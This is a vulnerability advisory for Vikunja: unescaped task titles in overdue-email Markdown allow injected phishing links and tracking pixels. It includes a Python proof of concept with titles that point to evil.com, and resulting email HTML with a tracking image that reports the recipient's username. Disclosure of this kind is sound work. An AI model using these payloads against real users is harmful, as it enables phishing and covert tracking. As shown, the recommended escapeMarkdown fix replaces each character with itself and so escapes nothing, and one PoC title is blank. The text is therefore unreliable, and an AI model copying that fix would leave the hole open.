PT-2026-31951 · Go+1 · Code.Vikunja.Io/Api+1
Published
2026-04-10
·
Updated
2026-04-10
·
CVE-2026-35600
CVSS v3.1
5.4
Medium
| AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N |
Summary
Task titles are embedded directly into Markdown link syntax in overdue email notifications without escaping Markdown special characters. When rendered by goldmark and sanitized by bluemonday (which allows
<a> and <img> tags), injected Markdown constructs produce phishing links and tracking pixels in legitimate notification emails.Details
The overdue task notification at
pkg/models/notifications.go:360 constructs a Markdown list entry:overdueLine += `* [` + task.Title + `](` + config.ServicePublicURL.GetString() + "tasks/" + strconv.FormatInt(task.ID, 10) + `) ...`
The task title is placed inside Markdown link syntax
[TITLE](URL). A title containing ] and [ breaks the link structure. The assembled Markdown is converted to HTML by goldmark at pkg/notifications/mail render.go:214, then sanitized by bluemonday's UGCPolicy. Since UGCPolicy intentionally allows <a href> and <img src> with http/https URLs, the injected links and images survive sanitization and reach the email recipient.The same pattern affects multiple notification types at
notifications.go lines 72, 176, 227, and 318.Proof of Concept
Tested on Vikunja v2.2.2 with SMTP enabled (MailHog as sink).
import requests
TARGET = "http://localhost:3456"
API = f"{TARGET}/api/v1"
token = requests.post(f"{API}/login",
json={"username": "alice", "password": "Alice1234!"}).json()["token"]
h = {"Authorization": f"Bearer {token}", "Content-Type": "application/json"}
proj = requests.put(f"{API}/projects", headers=h, json={"title": "Shared"}).json()
# create task with markdown injection in title + past due date
requests.put(f"{API}/projects/{proj['id']}/tasks", headers=h, json={
"title": 'test](https://evil.com) [Click to verify your account',
"due date": "2026-03-26T00:00:00Z"})
# create task with tracking pixel injection
requests.put(f"{API}/projects/{proj['id']}/tasks", headers=h, json={
"title": '',
"due date": "2026-03-26T00:00:00Z"})
# enable overdue reminders for the user
requests.post(f"{API}/user/settings/general", headers=h, json={
"email reminders enabled": True,
"overdue tasks reminders enabled": True,
"overdue tasks reminders time": "09:00"})
# wait for the overdue notification cron to fire, then inspect the email
The overdue notification email HTML contains:
<li>
<a href="https://evil.com">test</a>
<a href="http://vikunja.example/tasks/5">Click to verify your account</a>
(Shared), since one day
</li>
<li>
<a href="http://vikunja.example/tasks/6">
<img src="https://evil.com/track.png?user=bob">
</a>
(Shared), since one day
</li>
The attacker's
evil.com link appears as a clickable link in a legitimate Vikunja notification email. The tracking pixel loads when the email is opened.Impact
An attacker with write access to a shared project can craft task titles that inject phishing links or tracking images into overdue email notifications sent to other project members. Because these links appear within legitimate Vikunja notification emails from the configured SMTP server, recipients are more likely to trust and click them.
Recommended Fix
Escape Markdown special characters in task titles before embedding them in Markdown content:
func escapeMarkdown(s string) string {
replacer := strings.NewReplacer(
"[", "[", "]", "]",
"(", "(", ")", ")",
"!", "!", "`", "`",
"*", "*", " ", " ",
"#", "#",
)
return replacer.Replace(s)
}
Found and reported by aisafe.io
Fix
XSS
Found an issue in the description? Have something to add? Feel free to write us 👾
Weakness Enumeration
Related Identifiers
Affected Products
Code.Vikunja.Io/Api
Vikunja